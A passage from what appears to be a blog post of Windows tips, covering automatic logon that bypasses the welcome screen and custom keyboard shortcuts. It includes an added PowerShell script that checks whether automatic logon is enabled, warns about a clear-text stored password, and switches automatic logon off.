19. Get past the welcome screen<br />
<br />
You can automatically log on and bypass the welcome screen with this simple tweak. Choose Start > Run and type "control userpasswords2" into the Open box.<br />
<br />
Click OK to see a dialog with each user installed on the PC. Clear the box marked "Users must enter a username and password to use this computer". Click OK. Now restart, and you'll go directly to your desktop.<br />
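An added example, not part of the original post, for checking whether the automatic logon from this tip is switched on and for turning it back off: Windows records the choice in the Winlogon key named below (that key and its values are Windows knowledge, not something the post states), and a machine with it enabled gives its desktop to whoever powers it on.<br />

```powershell
# Added example (not from the original post): audit and revert automatic logon.
# Disable-AutoLogon needs an elevated prompt; Get-AutoLogonStatus does not.
$Winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonStatus {
    $p = Get-ItemProperty -Path $Winlogon
    [pscustomobject]@{
        Enabled = ($p.AutoAdminLogon -eq '1')   # REG_SZ "1" once the checkbox in the tip is cleared
        User    = $p.DefaultUserName
        Domain  = $p.DefaultDomainName
        # control userpasswords2 keeps the password as an LSA secret, not here. A
        # DefaultPassword value in this key means someone set it by hand, and the
        # password now sits in the registry in clear text.
        ClearTextPassword = ($null -ne $p.PSObject.Properties['DefaultPassword'])
    }
}

function Disable-AutoLogon {
    # Restores the normal logon screen and removes a clear-text password if one was left behind.
    Set-ItemProperty -Path $Winlogon -Name 'AutoAdminLogon' -Value '0'
    Remove-ItemProperty -Path $Winlogon -Name 'DefaultPassword' -ErrorAction SilentlyContinue
    Get-AutoLogonStatus
}

$status = Get-AutoLogonStatus
$status | Format-List
if ($status.Enabled) {
    Write-Warning ("Automatic logon is on: anyone who powers this machine on reaches " +
                   "$($status.Domain)\$($status.User)'s desktop without a password.")
}
if ($status.ClearTextPassword) {
    Write-Warning 'A clear-text DefaultPassword value is stored in the Winlogon key.'
}
# To revert the tip from a script rather than the dialog, run: Disable-AutoLogon
```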
<span style="color: black;">©Prasoon Nigam</span><br />
20. Custom keyboard shortcuts<br />
Works with: XP, Vista, Windows 7<br />
<br />
Create keyboard shortcuts to launch any program shortcut. Right-click the shortcut icon and choose Properties. Select the Shortcut key box and press a letter on the keyboard (such as [H]), then click OK. Now [Ctrl] + [Alt] + [H] will launch the shortcut. </div>
Pprasoon